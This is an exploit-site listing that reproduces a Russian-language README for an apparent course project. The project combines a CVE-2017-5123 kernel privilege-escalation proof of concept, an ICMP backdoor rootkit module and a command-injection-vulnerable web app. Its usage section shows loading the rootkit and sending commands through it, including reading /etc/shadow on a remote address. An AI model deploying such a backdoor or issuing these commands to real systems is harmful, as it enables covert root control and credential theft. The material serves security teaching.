Sploitus

Exploit for cve-2017-5123 CVE-2017-5123

kitploit Β· 2026-08-25

Exploit Code

MARKDOWN139 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-NABILBOUDRA-CVE-2017-5123
# CVE-2017-5123

Π­Ρ‚ΠΎΡ‚ Ρ€Π΅ΠΏΠΎΠ·ΠΈΡ‚ΠΎΡ€ΠΈΠΉ содСрТит Π΄Π΅ΠΌΠΎΠ½ΡΡ‚Ρ€Π°Ρ†ΠΈΡŽ **CVE-2017-5123** , ICMP-бэкдора с ΠΊΠΎΠΌΠ°Π½Π΄Π½Ρ‹ΠΌ ΡƒΠΏΡ€Π°Π²Π»Π΅Π½ΠΈΠ΅ΠΌ, ΠΈ Π²Π΅Π±-прилоТСния, уязвимого ΠΊ **CWE-78** (Π²Π½Π΅Π΄Ρ€Π΅Π½ΠΈΠ΅ ΠΊΠΎΠΌΠ°Π½Π΄ ОБ).

Π§Π°ΡΡ‚ΡŒ CSC 4308 – Challenge 3.

## ΠŸΡ€Π΅Π΄Π²Π°Ρ€ΠΈΡ‚Π΅Π»ΡŒΠ½Ρ‹Π΅ трСбования

  * **Π―Π΄Ρ€ΠΎ Linux** : 4.13 Π΄ΠΎ (Π½ΠΎ Π½Π΅ Π²ΠΊΠ»ΡŽΡ‡Π°Ρ) 4.13.7
  * **Node.js** : 10.x
  * **npm** : 6.x



## ΠžΠ±Π·ΠΎΡ€

Π­Ρ‚ΠΎΡ‚ ΠΏΡ€ΠΎΠ΅ΠΊΡ‚ дСмонстрируСт Ρ‚Ρ€ΠΈ Ρ€Π°Π·Π»ΠΈΡ‡Π½Ρ‹Ρ… ΠΊΠΎΠΌΠΏΠΎΠ½Π΅Π½Ρ‚Π° исслСдований бСзопасности:

### 1\. **Эксплойт ядра CVE-2017-5123** (`lkm/rootkit.c`)

Π”ΠΎΠΊΠ°Π·Π°Ρ‚Π΅Π»ΡŒΡΡ‚Π²ΠΎ ΠΊΠΎΠ½Ρ†Π΅ΠΏΡ†ΠΈΠΈ эксплойта уязвимости систСмного Π²Ρ‹Π·ΠΎΠ²Π° `waitid`, появившСйся Π² ядрС Linux 4.13. Π­Ρ‚Π° ΡƒΡΠ·Π²ΠΈΠΌΠΎΡΡ‚ΡŒ позволяСт ΠΏΠΎΠ²Ρ‹ΡΠΈΡ‚ΡŒ ΠΏΡ€ΠΈΠ²ΠΈΠ»Π΅Π³ΠΈΠΈ ΠΈ Π²Ρ‹ΠΉΡ‚ΠΈ ΠΈΠ· пСсочницы.

  * **CVE ID** : CVE-2017-5123
  * **CWE ID** : CWE-787 (Π²Ρ‹Ρ…ΠΎΠ΄ Π·Π° Π³Ρ€Π°Π½ΠΈΡ†Ρ‹ Π±ΡƒΡ„Π΅Ρ€Π°)
  * **ВоздСйствиС** : локальноС ΠΏΠΎΠ²Ρ‹ΡˆΠ΅Π½ΠΈΠ΅ ΠΏΡ€ΠΈΠ²ΠΈΠ»Π΅Π³ΠΈΠΉ
  * **Автор эксплойта** : Chris Salls (@chris_salls)



### 2\. **Π ΡƒΡ‚ΠΊΠΈΡ‚ ядра LKM** (`lkm/lkm.c`)

ВрСдоносный ΠΌΠΎΠ΄ΡƒΠ»ΡŒ ядра Linux (LKM), Ρ€Π΅Π°Π»ΠΈΠ·ΡƒΡŽΡ‰ΠΈΠΉ скрытый ΠΊΠ°Π½Π°Π» управлСния ΠΈ контроля Ρ‡Π΅Ρ€Π΅Π· ICMP-ΠΏΠ°ΠΊΠ΅Ρ‚Ρ‹ эхо-запроса (ping).

  * **CWE ID** : CWE-912 (скрытая Ρ„ΡƒΠ½ΠΊΡ†ΠΈΠΎΠ½Π°Π»ΡŒΠ½ΠΎΡΡ‚ΡŒ)
  * **Π€ΡƒΠ½ΠΊΡ†ΠΈΠΎΠ½Π°Π»ΡŒΠ½ΠΎΡΡ‚ΡŒ** : 
    * ΠŸΠ΅Ρ€Π΅Ρ…Π²Π°Ρ‚Ρ‹Π²Π°Π΅Ρ‚ ICMP-эхо-запросы с Π½ΠΎΠΌΠ΅Ρ€ΠΎΠΌ ΠΏΠΎΡΠ»Π΅Π΄ΠΎΠ²Π°Ρ‚Π΅Π»ΡŒΠ½ΠΎΡΡ‚ΠΈ `25678`
    * Π˜Π·Π²Π»Π΅ΠΊΠ°Π΅Ρ‚ ΠΊΠΎΠΌΠ°Π½Π΄Ρ‹ ΠΎΠ±ΠΎΠ»ΠΎΡ‡ΠΊΠΈ ΠΈΠ· ΠΏΠΎΠ»Π΅Π·Π½ΠΎΠΉ Π½Π°Π³Ρ€ΡƒΠ·ΠΊΠΈ ICMP
    * ВыполняСт ΠΊΠΎΠΌΠ°Π½Π΄Ρ‹ с ΠΏΡ€Π°Π²Π°ΠΌΠΈ root
    * Π’ΠΎΠ·Π²Ρ€Π°Ρ‰Π°Π΅Ρ‚ Π²Ρ‹Π²ΠΎΠ΄ ΠΊΠΎΠΌΠ°Π½Π΄ Ρ‡Π΅Ρ€Π΅Π· ICMP-ΠΏΠ°ΠΊΠ΅Ρ‚Ρ‹ эхо-ΠΎΡ‚Π²Π΅Ρ‚Π°



### 3\. **УязвимоС Π²Π΅Π±-ΠΏΡ€ΠΈΠ»ΠΎΠΆΠ΅Π½ΠΈΠ΅** (`vulnerable-app/`)

ΠŸΡ€ΠΈΠ»ΠΎΠΆΠ΅Π½ΠΈΠ΅ для ΠΎΠ±ΠΌΠ΅Π½Π° Ρ„Π°ΠΉΠ»Π°ΠΌΠΈ Π½Π° React + Node.js, уязвимоС ΠΊ Π²Π½Π΅Π΄Ρ€Π΅Π½ΠΈΡŽ ΠΊΠΎΠΌΠ°Π½Π΄ ОБ.

  * **CWE ID** : CWE-78 (Π²Π½Π΅Π΄Ρ€Π΅Π½ΠΈΠ΅ ΠΊΠΎΠΌΠ°Π½Π΄ ОБ)
  * **Π‘Π»Π°Π±ΠΎΡΡ‚ΡŒ** : Π²Π½Π΅Π΄Ρ€Π΅Π½ΠΈΠ΅ мСтасимволов ΠΎΠ±ΠΎΠ»ΠΎΡ‡ΠΊΠΈ Π² ΠΏΠΎΠ»Π΅ содСрТимого Ρ„Π°ΠΉΠ»Π°



### 4\. **ICMP Pinger для Π΄Π°Π½Π½Ρ‹Ρ…** (`pinger/data-ping.c`)

Π£Ρ‚ΠΈΠ»ΠΈΡ‚Π° для ΠΎΡ‚ΠΏΡ€Π°Π²ΠΊΠΈ ΡΠΏΠ΅Ρ†ΠΈΠ°Π»ΡŒΠ½ΠΎ сформированных ICMP-эхо-запросов с ΠΏΡ€ΠΎΠΈΠ·Π²ΠΎΠ»ΡŒΠ½ΠΎΠΉ ΠΏΠΎΠ»Π΅Π·Π½ΠΎΠΉ Π½Π°Π³Ρ€ΡƒΠ·ΠΊΠΎΠΉ для взаимодСйствия с бэкдором Ρ€ΡƒΡ‚ΠΊΠΈΡ‚Π° ядра.

## ИспользованиС

### Π—Π°Π³Ρ€ΡƒΠ·ΠΊΠ° LKM

#### Π‘Π±ΠΎΡ€ΠΊΠ° модуля ядра

root@kitploit:~
    
    
    cd lkm
    make
    

#### Π—Π°Π³Ρ€ΡƒΠ·ΠΊΠ° модуля ядра

root@kitploit:~
    
    
    sudo insmod lkm.ko
    

#### Π‘Π±ΠΎΡ€ΠΊΠ° ΠΊΠ»ΠΈΠ΅Π½Ρ‚Π° Pinger

root@kitploit:~
    
    
    cd ../pinger
    gcc -o data-ping data-ping.c
    

#### ΠžΡ‚ΠΏΡ€Π°Π²ΠΊΠ° ΠΊΠΎΠΌΠ°Π½Π΄ Ρ‡Π΅Ρ€Π΅Π· ICMP

root@kitploit:~
    
    
    # Π”ΠΎΠ»ΠΆΠ½ΠΎ Π²Ρ‹ΠΏΠΎΠ»Π½ΡΡ‚ΡŒΡΡ ΠΎΡ‚ root для использования raw-сокСтов
    sudo ./data-ping <target-ip> "whoami"
    sudo ./data-ping localhost "ls -la /root"
    sudo ./data-ping 192.168.1.100 "cat /etc/shadow"
    

#### Π’Ρ‹Π³Ρ€ΡƒΠ·ΠΊΠ° модуля

root@kitploit:~
    
    
    sudo rmmod lkm
    

#### Быстрая ΠΏΠ΅Ρ€Π΅Π·Π°Π³Ρ€ΡƒΠ·ΠΊΠ°

root@kitploit:~
    
    
    make reload
    

### Запуск уязвимого Π²Π΅Π±-прилоТСния

root@kitploit:~
    
    
    # Π‘Π±ΠΎΡ€ΠΊΠ° Ρ„Ρ€ΠΎΠ½Ρ‚Π΅Π½Π΄Π°
    cd vulnerable-app/frontend
    npm run build
    
    # ΠšΠΎΠΏΠΈΡ€ΠΎΠ²Π°Π½ΠΈΠ΅ собранного прилоТСния Π² бэкСнд
    cp -r build ../backend/
    
    # Запуск сСрвСра бэкСнда (обслуТиваСт ΠΈ API, ΠΈ Ρ„Ρ€ΠΎΠ½Ρ‚Π΅Π½Π΄)
    cd ../backend
    npm start
    

ΠŸΡ€ΠΈΠ»ΠΎΠΆΠ΅Π½ΠΈΠ΅ Π±ΡƒΠ΄Π΅Ρ‚ доступно ΠΏΠΎ адрСсу `http://localhost:3001`

## Бсылки

  * **CVE-2017-5123** : https://vulners.com/cve/CVE-2017-5123
  * **CWE-78** : https://cwe.mitre.org/data/definitions/78.html
  * **CWE-787** : https://cwe.mitre.org/data/definitions/787.html
  * **CWE-912** : https://cwe.mitre.org/data/definitions/912.html
  * **ΠžΡ€ΠΈΠ³ΠΈΠ½Π°Π»ΡŒΠ½Ρ‹ΠΉ ΠΊΠΎΠ΄ эксплойта Chris Salls** : https://github.com/salls/kernel-exploits